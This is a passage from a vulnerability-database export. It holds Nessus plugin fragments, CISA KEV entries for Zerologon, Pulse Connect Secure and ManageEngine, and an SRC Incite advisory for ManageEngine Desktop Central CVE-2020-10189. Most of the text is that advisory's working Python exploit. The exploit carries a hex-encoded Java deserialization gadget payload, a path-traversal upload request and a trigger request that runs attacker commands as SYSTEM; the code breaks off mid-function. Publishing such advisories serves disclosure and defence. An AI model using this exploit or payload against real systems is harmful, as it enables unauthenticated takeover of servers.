reference:\"samba-client-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debugsource-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-python3-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-winbind-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-09T14:46:42", "description": "The Netlogon service on the remote host is vulnerable to the zerologon vulnerability. An unauthenticated, remote attacker can exploit this, by spoofing a client credential to establish a secure channel to a domain controller using the Netlogon remote protocol (MS-NRPC). The attacker can then use this to change the computer's Active Directory (AD) password, and escalate privileges to domain admin.\n\nIn order for this plugin to run, you must disable 'Only use credentials provided by the user' in the scanner settings.", "cvss3": {}, "published": "2020-09-18T00:00:00", "type": "nessus", "title": "Microsoft Netlogon Elevation of Privilege (Zerologon) (Remote)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-06-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "href": "https://www.tenable.com/plugins/nessus/140657", "sourceData": "Binary data netlogon_zerologon_CVE-2020-1472.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-06-05T15:37:18", "description": "Zoho ManageEngine Desktop Central contains a file upload vulnerability that allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Zoho ManageEngine Desktop Central File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-10189", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-10T15:46:28", "description": "Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-11510", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Microsoft's Netlogon Remote Protocol (MS-NRPC) contains a privilege escalation vulnerability when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller. An attacker who successfully exploits the vulnerability could run a specially crafted application on a device on the network. The vulnerability is also known under the moniker of Zerologon.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Netlogon Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1472", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "srcincite": [{"lastseen": "2023-06-05T15:14:01", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the FileStorage class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.\n\n**Affected Vendors:**\n\nManageEngine\n\n**Affected Products:**\n\nDesktop Central\n\n**Vendor Response:**\n\nManageEngine has issued an update to correct this vulnerability. More details can be found at: \n<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2020-0011 : ManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "SRC-2020-0011", "href": "https://srcincite.io/advisories/src-2020-0011/", "sourceData": "#!/usr/bin/env python3\n\"\"\"\nManageEngine Desktop Central FileStorage getChartImage Deserialization of Untrusted Data Remote Code Execution Vulnerability\n\nDownload: https://www.manageengine.com/products/desktop-central/download-free.html\nFile ...: ManageEngine_DesktopCentral_64bit.exe\nSHA1 ...: 73ab5bb00f993685c711c0aed450444795d5b826\nFound by: mr_me\nDate ...: 2019-12-12\nCVE ....: CVE-2020-10189\nClass ..: CWE-502\nCVSS ...: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\nPatch ..: https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n\n## Summary:\n\nAn unauthenticated attacker can reach a Deserialization of Untrusted Data vulnerability that can allow them to execute arbitrary code as SYSTEM/root.\n\n## Vulnerability Analysis:\n\nIn the web.xml file, we can see one of the default available servlets is the `CewolfServlet` servlet.\n\n```CewolfServletde.laures.cewolf.CewolfRendererdebugfalseoverliburl/js/overlib.jsstoragede.laures.cewolf.storage.FileStorage1...CewolfServlet/cewolf/*```\n\nThis servlet, contains the following code:\n\n```\n protected void doGet(HttpServletRequest request, HttpServletResponse response)\n throws ServletException, IOException {\n if (debugged) {\n logRequest(request);\n }\n addHeaders(response);\n if ((request.getParameter(\"state\") != null) || (!request.getParameterNames().hasMoreElements())) {\n requestState(response);\n return;\n }\n int width = 400;\n int height = 400;\n boolean removeAfterRendering = false;\n if (request.getParameter(\"removeAfterRendering\") != null) {\n removeAfterRendering = true;\n }\n if (request.getParameter(\"width\") != null) {\n width = Integer.parseInt(request.getParameter(\"width\"));\n }\n if (request.getParameter(\"height\") != null) {\n height = Integer.parseInt(request.getParameter(\"height\"));\n }\n if (!renderingEnabled) {\n renderNotEnabled(response, 400, 50);\n return;\n }\n if ((width > config.getMaxImageWidth()) || (height > config.getMaxImageHeight())) {\n renderImageTooLarge(response, 400, 50);\n return;\n }\n String imgKey = request.getParameter(\"img\"); // 1\n if (imgKey == null) {\n logAndRenderException(new ServletException(\"no 'img' parameter provided for Cewolf servlet.\"), response,\n width, height);\n return;\n }\n Storage storage = config.getStorage();\n ChartImage chartImage = storage.getChartImage(imgKey, request); // 2\n```\n\nAt [1] the code sets the `imgKey` variable using the GET parameter `img`. Later at [2], the code then calls the `storage.getChartImage` method with the attacker supplied `img`. You maybe wondering what class the `storage` instance is. This was mapped as an initializing parameter to the servlet code in the web.xml file:\n\n```storagede.laures.cewolf.storage.FileStorage```\n\n```\npublic class FileStorage implements Storage {\n static final long serialVersionUID = -6342203760851077577L;\n String basePath = null;\n List stored = new ArrayList();\n private boolean deleteOnExit = false;\n\n //...\n\n public void init(ServletContext servletContext) throws CewolfException {\n basePath = servletContext.getRealPath(\"/\");\n Configuration config = Configuration.getInstance(servletContext);\n deleteOnExit = \"true\".equalsIgnoreCase(\"\" + (String) config.getParameters().get(\"FileStorage.deleteOnExit\"));\n servletContext.log(\"FileStorage initialized, deleteOnExit=\" + deleteOnExit);\n }\n\n //...\n\n private String getFileName(String id) {\n return basePath + \"_chart\" + id; // 4\n }\n\n //...\n\n public ChartImage getChartImage(String id, HttpServletRequest request) {\n ChartImage res = null;\n ObjectInputStream ois = null;\n try {\n ois = new ObjectInputStream(new FileInputStream(getFileName(id))); // 3\n res = (ChartImage) ois.readObject(); // 5\n ois.close();\n } catch (Exception ex) {\n ex.printStackTrace();\n } finally {\n if (ois != null) {\n try {\n ois.close();\n } catch (IOException ioex) {\n ioex.printStackTrace();\n }\n }\n }\n return res;\n }\n```\n\nAt [3] the code calls `getFileName` using the attacker controlled `id` GET parameter which returns a path to a file on the filesystem using `basePath`. This field is set in the `init` method of the servlet. On the same line, the code creates a new `ObjectInputStream` instance from the supplied filepath via `FileInputStream`. This path is attacker controlled at [4], however, there is no need to (ab)use traversals here for exploitation.\n\nThe most important point is that at [5] the code calls `readObject` using the contents of the file without any further lookahead validation.\n\n## Exploitation:\n\nFor exploitation, an attacker can (ab)use the `MDMLogUploaderServlet` servlet to plant a file on the filesystem with controlled content inside. Here is the corresponding web.xml entry:\n\n```MDMLogUploaderServletcom.me.mdm.onpremise.webclient.log.MDMLogUploaderServlet...MDMLogUploaderServlet/mdm/mdmLogUploader/mdm/client/v1/mdmLogUploader```\n\n```\npublic class MDMLogUploaderServlet extends DeviceAuthenticatedRequestServlet {\n private Logger logger = Logger.getLogger(\"MDMLogger\");\n private Long customerID;\n private String deviceName;\n private String domainName;\n private Long resourceID;\n private Integer platformType;\n private Long acceptedLogSize = Long.valueOf(314572800L);\n\n public void doPost(HttpServletRequest request, HttpServletResponse response, DeviceRequest deviceRequest)\n throws ServletException, IOException {\n Reader reader = null;\n PrintWriter printWriter = null;\n\n logger.log(Level.WARNING, \"Received Log from agent\");\n\n Long nDataLength = Long.valueOf(request.getContentLength());\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : file conentent lenght is {0}\", nDataLength);\n\n logger.log(Level.WARNING, \"MDMLogUploaderServlet :Acceptable file conentent lenght is {0}\", acceptedLogSize);\n try {\n if (nDataLength.longValue() <= acceptedLogSize.longValue()) {\n String udid = request.getParameter(\"udid\"); // 1\n String platform = request.getParameter(\"platform\");\n String fileName = request.getParameter(\"filename\"); // 2\n HashMap deviceMap = MDMUtil.getInstance().getDeviceDetailsFromUDID(udid);\n if (deviceMap != null) {\n customerID = ((Long) deviceMap.get(\"CUSTOMER_ID\"));\n deviceName = ((String) deviceMap.get(\"MANAGEDDEVICEEXTN.NAME\"));\n domainName = ((String) deviceMap.get(\"DOMAIN_NETBIOS_NAME\"));\n resourceID = ((Long) deviceMap.get(\"RESOURCE_ID\"));\n platformType = ((Integer) deviceMap.get(\"PLATFORM_TYPE\"));\n } else {\n customerID = Long.valueOf(0L);\n deviceName = \"default\";\n domainName = \"default\";\n }\n String baseDir = System.getProperty(\"server.home\");\n\n deviceName = removeInvalidCharactersInFileName(deviceName);\n\n String localDirToStore = baseDir + File.separator + \"mdm-logs\" + File.separator + customerID\n + File.separator + deviceName + \"_\" + udid; // 3\n\n File file = new File(localDirToStore);\n if (!file.exists()) {\n file.mkdirs(); // 4\n }\n logger.log(Level.WARNING, \"absolute Dir {0} \", new Object[]{localDirToStore});\n\n fileName = fileName.toLowerCase();\n if ((fileName != null) && (FileUploadUtil.hasVulnerabilityInFileName(fileName, \"log|txt|zip|7z\"))) { // 5\n logger.log(Level.WARNING, \"MDMLogUploaderServlet : Going to reject the file upload {0}\", fileName);\n response.sendError(403, \"Request Refused\");\n return;\n }\n String absoluteFileName = localDirToStore + File.separator + fileName; // 6\n\n logger.log(Level.WARNING, \"absolute File Name {0} \", new Object[]{fileName});\n\n InputStream in = null;\n FileOutputStream fout = null;\n try {\n in = request.getInputStream(); // 7\n fout = new FileOutputStream(absoluteFileName); // 8\n\n byte[] bytes = new byte['\u2710'];\n int i;\n while ((i = in.read(bytes)) != -1) {\n fout.write(bytes, 0, i); // 9\n }\n fout.flush();\n } catch (Exception e1) {\n e1.printStackTrace();\n } finally {\n if (fout != null) {\n fout.close();\n }\n if (in != null) {\n in.close();\n }\n }\n SupportFileCreation supportFileCreation = SupportFileCreation.getInstance();\n supportFileCreation.incrementMDMLogUploadCount();\n JSONObject deviceDetails = new JSONObject();\n deviceDetails.put(\"platformType\", platformType);\n deviceDetails.put(\"dataId\", resourceID);\n deviceDetails.put(\"dataValue\", deviceName);\n supportFileCreation.removeDeviceFromList(deviceDetails);\n } else {\n logger.log(Level.WARNING,\n \"MDMLogUploaderServlet : Going to reject the file upload as the file conentent lenght is {0}\",\n nDataLength);\n response.sendError(403, \"Request Refused\");\n return;\n }\n return;\n } catch (Exception e) {\n logger.log(Level.WARNING, \"Exception \", e);\n } finally {\n if (reader != null) {\n try {\n reader.close();\n } catch (Exception ex) {\n ex.fillInStackTrace();\n }\n }\n }\n }\n```\n\n```\n private static boolean isContainDirectoryTraversal(String fileName) {\n if ((fileName.contains(\"/\")) || (fileName.contains(\"\\\\\"))) {\n return true;\n }\n return false;\n }\n\n //...\n\n public static boolean hasVulnerabilityInFileName(String fileName, String allowedFileExt) {\n if ((isContainDirectoryTraversal(fileName)) || (isCompletePath(fileName))\n || (!isValidFileExtension(fileName, allowedFileExt))) {\n return true;\n }\n return false;\n }\n```\n\nWe can see that at [1] the `udid` variable is controlled using the `udid` GET parameter from a POST request. At [2] the `fileName` variable is controlled from the GET parameter `filename`. This `filename` GET parameter is actually filtered in 2 different ways for malicious values. At [3] a path is contructed using the GET parameter from [1] and at [4] a `mkdirs` primitive is hit. This is important because the _charts directory doesn't exist on the filesystem which is needed in order to exploit the deserialization bug. There is some validation on the `filename` at [5] which calls `FileUploadUtil.hasVulnerabilityInFileName` to check for directory traversals and an allow list of extensions.\n\nOf course, this doesn't stop `udid` from containing directory traversals, but I digress. At [6] the `absoluteFileName` variable is built up from the attacker influenced path at [3] using the filename from [2] and at [7] the binary input stream is read from the attacker controlled POST body. Finally at [8] and [9] the file is opened and the contents of the request is written to disk. What is not apparent however, is that further validation is performed on the `filename` at [2]. Let's take one more look at the web.xml file:\n\n```config-filesecurity-regex.xml,security-mdm-regex.xml,security-mdm-api-regex.xml,security-properties.xml,security-common.xml,security-admin-sec-settings.xml,security-fws.xml,security-api.xml,security-patch-restapi.xml,security-mdm-groupdevices.xml,security-mdm-admin.xml,security-mdm-general.xml,security-mdm-agent.xml,security-mdm-reports.xml,security-mdm-inventory.xml,security-mdm-appmgmt.xml,security-mdm-docmgmt.xml,security-mdm-configuration.xml,security-defaultresponseheaders.xml,security-mdm-remote.xml,security-mdm-api-json.xml,security-mdm-api-get.xml,security-mdm-api-post.xml,security-mdm-api-put.xml,security-mdm-api-delete.xml,security-mdm-privacy.xml,security-mdm-osmgmt.xml,security-mdmapi-appmgmt.xml,security-mdmapi-profilejson.xml,security-mdmapi-profilemgmt.xml,security-mdm-compliance.xml,security-mdm-geofence.xml,security-mdmapi-sdp.xml,security-mdmp-CEA.xml,security-mdmapi-supporttab.xml,security-mdmapi-general.xml,security-mdm-roles.xml,security-mdm-technicians.xml,security-mdm-cea.xml,security-mdmapi-content-mgmt.xml,security-config.xml,security-patch.xml,security-patch-apd-scan.xml,security-patch-apd-scan-views.xml,security-patch-deployment.xml,security-patch-views.xml,security-patch-config.xml,security-patch-onpremise.xml,security-patch-server.xml,security-onpremise-common.xml,security-mdm-onpremise-files.xml,security-mdmapi-directory.xml,security-admin.xml,security-onpremise-admin.xml,security-reports.xml,security-inventory.xml,security-custom-fields.xml```\n\nThe file that stands out is the `security-mdm-agent.xml` config file. The corrosponding entry for the `MDMLogUploaderServlet` servlet looks like this:\n\n``````\n\nNote that the authentication attribute is ignored in this case. The `filename` GET parameter is restricted to the following strings: \"logger.txt\", \"logger.zip\", \"mdmlogs.zip\" and \"managedprofile_mdmlogs.zip\" using a regex pattern. For exploitation, this limitation doesn't matter since the deserialization bug permits a completely controlled filename.\n\n## Example:\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py(+) eg: ./poc.py 172.16.175.153 mspaint.exe\n\nsaturn:~ mr_me$ ./poc.py 172.16.175.153 \"cmd /c whoami > ../webapps/DesktopCentral/si.txt\"\n(+) planted our serialized payload\n(+) executed: cmd /c whoami > ../webapps/DesktopCentral/si.txt\n\nsaturn:~ mr_me$ curl http://172.16.175.153:8020/si.txt\nnt authority\\system\n\"\"\"\nimport os\nimport sys\nimport struct\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_payload(c):\n p = \"aced0005737200176a6176612e7574696c2e5072696f72697479517565756594\"\n p += \"da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400\"\n p += \"164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200\"\n p += \"2b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265\"\n p += \"616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d706172\"\n p += \"61746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e\"\n p += \"672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e\"\n p += \"732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d706172\"\n p += \"61626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f75\"\n p += \"7470757450726f706572746965737704000000037372003a636f6d2e73756e2e\"\n p += \"6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e\"\n p += \"747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d\"\n p += \"5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b00\"\n p += \"0a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a\"\n p += \"6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f\"\n p += \"6f757470757450726f706572746965737400164c6a6176612f7574696c2f5072\"\n p += \"6f706572746965733b787000000000ffffffff757200035b5b424bfd19156767\"\n p += \"db37020000787000000002757200025b42acf317f8060854e002000078700000\"\n p += \"069bcafebabe0000003200390a00030022070037070025070026010010736572\"\n p += \"69616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75\"\n p += \"6505ad2093f391ddef3e0100063c696e69743e010003282956010004436f6465\"\n p += \"01000f4c696e654e756d6265725461626c650100124c6f63616c566172696162\"\n p += \"6c655461626c6501000474686973010013537475625472616e736c6574506179\"\n p += \"6c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c\"\n p += \"2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e73\"\n p += \"6c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f\"\n p += \"73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f7873\"\n p += \"6c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c\"\n p += \"2f696e7465726e616c2f73657269616c697a65722f53657269616c697a617469\"\n p += \"6f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73\"\n p += \"756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c\"\n p += \"74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f\"\n p += \"72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65\"\n p += \"722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074\"\n p += \"696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78\"\n p += \"616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e\"\n p += \"2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d\"\n p += \"417869734974657261746f723b4c636f6d2f73756e2f6f72672f617061636865\"\n p += \"2f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c69\"\n p += \"7a6174696f6e48616e646c65723b29560100086974657261746f720100354c63\"\n p += \"6f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64\"\n p += \"746d2f44544d417869734974657261746f723b01000768616e646c6572010041\"\n p += \"4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c\"\n p += \"2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c6572\"\n p += \"3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a\"\n p += \"000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f\"\n p += \"4761646765747324537475625472616e736c65745061796c6f6164010040636f\"\n p += \"6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f\"\n p += \"78736c74632f72756e74696d652f41627374726163745472616e736c65740100\"\n p += \"146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f\"\n p += \"6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f\"\n p += \"5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061\"\n p += \"796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100\"\n p += \"116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e7469\"\n p += \"6d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a\"\n p += \"002b002e01000708003001000465786563010027284c6a6176612f6c616e672f\"\n p += \"537472696e673b294c6a6176612f6c616e672f50726f636573733b0c00320033\"\n p += \"0a002b003401000d537461636b4d61705461626c6501001d79736f7365726961\"\n p += \"6c2f50776e6572373633323838353835323036303901001f4c79736f73657269\"\n p += \"616c2f50776e657237363332383835383532303630393b002100020003000100\"\n p += \"040001001a000500060001000700000002000800040001000a000b0001000c00\"\n p += \"00002f00010001000000052ab70001b100000002000d0000000600010000002e\"\n p += \"000e0000000c000100000005000f003800000001001300140002000c0000003f\"\n p += \"0000000300000001b100000002000d00000006000100000033000e0000002000\"\n p += \"0300000001000f00380000000000010015001600010000000100170018000200\"\n p += \"19000000040001001a00010013001b0002000c000000490000000400000001b1\"\n p += \"00000002000d00000006000100000037000e0000002a000400000001000f0038\"\n p += \"00000000000100150016000100000001001c001d000200000001001e001f0003\"\n p += \"0019000000040001001a00080029000b0001000c00000024000300020000000f\"\n p += \"a70003014cb8002f1231b6003557b10000000100360000000300010300020020\"\n p += \"00000002002100110000000a000100020023001000097571007e0010000001d4\"\n p += \"cafebabe00000032001b0a000300150700170700180700190100107365726961\"\n p += \"6c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505\"\n p += \"71e669ee3c6d47180100063c696e69743e010003282956010004436f64650100\"\n p += \"0f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c65\"\n p += \"5461626c6501000474686973010003466f6f01000c496e6e6572436c61737365\"\n p += \"730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f476164\"\n p += \"6765747324466f6f3b01000a536f7572636546696c6501000c47616467657473\"\n p += \"2e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f61\"\n p += \"64732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f\"\n p += \"4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f\"\n p += \"79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747300\"\n p += \"2100020003000100040001001a00050006000100070000000200080001000100\"\n p += \"0a000b0001000c0000002f00010001000000052ab70001b100000002000d0000\"\n p += \"000600010000003b000e0000000c000100000005000f00120000000200130000\"\n p += \"0002001400110000000a000100020016001000097074000450776e7270770100\"\n p += \"7871007e000d78\"\n obj = bytearray(bytes.fromhex(p))\n obj[0x240:0x242] = struct.pack(\">H\", len(c) + 0x694)\n obj[0x6e5:0x6e7] = struct.pack(\">H\", len(c))\n start = obj[:0x6e7]\n end = obj[0x6e7:]\n return start + str.encode(c) + end\n\ndef we_can_plant_serialized(t, c):\n # stage 1 - traversal file write primitive\n uri = \"https://%s:8383/mdm/client/v1/mdmLogUploader\" % t\n p = {\n \"udid\" : \"si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart\",\n \"filename\" : \"logger.zip\"\n }\n h = { \"Content-Type\" : \"application/octet-stream\" }\n d = _get_payload(c)\n r = requests.post(uri, params=p, data=d, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_execute_cmd(t):\n # stage 2 - deserialization\n uri = \"https://%s:8383/cewolf/\" % t\n p = { \"img\" : \"\\\\logger.zip\" }\n r = requests.get(uri, params=p, verify=False)\n if 